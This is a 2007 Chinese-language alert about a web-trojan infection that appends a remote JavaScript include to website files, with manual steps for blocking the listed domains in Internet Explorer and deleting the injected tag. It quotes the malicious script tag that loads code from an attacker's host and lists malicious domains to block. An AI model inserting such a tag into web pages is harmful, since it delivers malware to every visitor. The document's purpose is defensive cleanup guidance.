昨日爆发的网马病毒,有新的进展,原本并没注意那么多,后来才发现,所有.htm、.html、asp等等网页文本被大面积感染，在所有页面最下面加入java srcipt调用：调用原句为  <script language=javascript src=http://qqq.dzydhx.com/gm.js></script> 请将其删除再进行保存，由于本病毒属于网络调用，所以任何杀毒软件都无法删除！请手工操作！





如果你不是很懂网页知识的话，请按以下步骤操作：

1.打开IE，选择工具（T）=》internet 选项（O）=》安全=》受限制的站点=》站点（S）=》输入：*.aishengho.com=》添加（A）=》再输入：*.dzydhx.com=》添加（A），同样*.is686.com  *.51yes.com  =》确定



2.打开我的电脑=》搜索=》.htm=》立即搜索=》找到文件，请不要直接打开，而是右键=》打开方式=》记事本=》删除<script language=javascript src=http://qqq.dzydhx.com/gm.js></script> =》保存，所有的文件都要仔细删除后保存，或者如果你的文件对你并不重要的话，可以直接全部删除，如果你是站长，请自己注意了。同样还要搜索其他格式.asp和php和jsp等等网页形式的文本




2007.12.24 22：00 截获此其病毒，非常严重





之前发布的信息：

[当心]http://qqq.aishengho.com网马

http://bbs.kaspersky.com.cn/viewthread.php?tid=40371&extra=page%3D1





[崇明电脑网]为您提供以上信息

[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0(Compatible Mozilla/4.0(Compatible-EmbeddedWB 14.59 http://bsalsa.com/ EmbeddedWB- 14.59  from: http://bsalsa.com/ )